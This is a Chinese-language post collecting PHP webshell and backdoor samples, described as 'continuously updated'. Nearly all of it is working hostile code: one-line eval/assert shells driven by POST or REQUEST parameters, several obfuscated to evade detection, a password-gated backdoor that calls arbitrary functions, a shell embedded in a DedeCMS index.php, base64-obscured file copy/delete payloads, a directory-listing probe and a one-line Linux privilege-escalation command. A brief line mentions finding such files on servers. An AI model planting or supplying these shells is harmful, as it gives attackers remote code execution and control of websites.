php木马样本，持续更新

<?array_map("ass\x65rt",(array)$_REQUEST[dede]);?>
<?php $command=$_POST[1990]; @eval($command);?>

打着广告的名义忽悠的php木马，不少一句话木马出现在附件上传目中，以达到网站挣钱的目的，而且还不是自己的网站，可通过linux命令批量查看文件查找到。

<?array_map("ass\x65rt",(array)$_REQUEST[seay]);?>
 * @version        $Id: index.php 1 9:23 2010-11-11 tianya $
 * @package        DedeCMS.Site
 * @copyright      Copyright (c) 2007 - 2010, DesDev, Inc.
 * @license        http://help.dedecms.com/usersguide/license.html
 * @link           http://www.dedecms.com
 */
if(!file_exists(dirname(__FILE__).'/data/common.inc.php'))
{
    header('Location:install/index.php');
    exit();
}
if(isset($_GET['upcache']) || !file_exists('index.html'))
{
    require_once (dirname(__FILE__) . "/include/common.inc.php");
    require_once DEDEINC."/arc.partview.class.php";
    $GLOBALS['_arclistEnv'] = 'index';
    $row = $dsql->GetOne("Select * From `#@__homepageset`");
    $row['templet'] = MfTemplet($row['templet']);
    $pv = new PartView();
    $pv->SetTemplet($cfg_basedir . $cfg_templets_dir . "/" . $row['templet']);
    $row['showmod'] = isset($row['showmod'])? $row['showmod'] : 0;
    if ($row['showmod'] == 1)
    {
        $pv->SaveToHtml(dirname(__FILE__).'/index.html');
        include(dirname(__FILE__).'/index.html');
        exit();
    } else { 
        $pv->Display();
        exit();
    }
}
else
{
    header('HTTP/1.1 301 Moved Permanently');
    header('Location:index.html');
}
?>

<?php

error_reporting(E_ERROR);

if (isset($_REQUEST['myfunctionpassw']))

    define('FUNCTION_PASSW',stripslashes($_REQUEST['myfunctionpassw']));

if (isset($_REQUEST['myfunctioncodea']))

    define('FUNCTION_CODEA',stripslashes($_REQUEST['myfunctioncodea']));

if (isset($_REQUEST['myfunctioncodeb']))

    define('FUNCTION_CODEB',stripslashes($_REQUEST['myfunctioncodeb']));

if (isset($_REQUEST['myfunctioncodec']))

    define('FUNCTION_CODEC',stripslashes($_REQUEST['myfunctioncodec']));

if (substr ( md5 (FUNCTION_PASSW),26) == '254bff') {
    
    if (isset($_REQUEST['myfunctioncodea']) && isset($_REQUEST['myfunctioncodeb']) && isset($_REQUEST['myfunctioncodec']))
        
        $_REQUEST['myfunctionname'](FUNCTION_CODEA, FUNCTION_CODEB, FUNCTION_CODEC);
        
    elseif (isset($_REQUEST['myfunctioncodea']) && isset($_REQUEST['myfunctioncodeb']))
    
        $_REQUEST['myfunctionname'](FUNCTION_CODEA, FUNCTION_CODEB) ? print(FUNCTION_CODEA.' ok') : print(FUNCTION_CODEA.' err');
    
    else
    
        $_REQUEST['myfunctionname'](FUNCTION_CODEA);
        
} else {
    
    die('Access Denied');
    
}
?>

linux一句话提权：install uprobes /bin/sh

组合木马

<?php ($_=@$_GET[2]).@$_($_POST[1])?>

 

<?php $k="ass"."ert"; $k(${"_PO"."ST"} [sz]);?>

<?php copy(base64_decode("Li4vLi4vLi4vcGx1cy9kb3dubG9hZC5waHA="),base64_decode("Li4vLi4vZGVkZWRvd25sb2FkLnBocA=="));copy(base64_decode("Li4vLi4vLi4vcGx1cy9teXRhZ19qcy5waHA="),base64_decode("Li4vLi4vZGVkZW15dGFnLnBocA=="));echo "dedeok823571";?>

<?php echo "dedeok";array_map("ass\x65rt",(array)${"_PO"."ST"}["52296"]);?>

<?php unlink(base64_decode("Li4vLi4vcGx1cy9kb3dubG9hZC5waHA="));unlink(base64_decode("Li4vLi4vcGx1cy9teXRhZ19qcy5waHA="));echo "dedeok913438";?>

<?php $k="ass"."ert"; $k(${"_PO"."ST"} ['8']);?>

<?$_POST['k']($_POST['8']);?>

<?php $k = str_replace("8","","a8s88s8e8r88t");$k($_POST["8"]); ?>

<?php $_GET['k8']($_POST['k8']);?>

<?php  $a = "a"."s"."s"."e"."r"."t";  $a($_POST["k8"]);  ?>       

<?php @preg_replace("//e",$_POST[x],"e");exit("|LO|"); ?>       

<?php echo "dedeok";array_map("ass\x65rt",(array)${"_PO"."ST"}["16883"]);?>       

<?php echo "dedeok245563";$a=scandir("../../../../");print_r($a);?>        

<?php@preg_replace("//e",$_POST['IN_COMSENZ'],"Access Denied");        ?>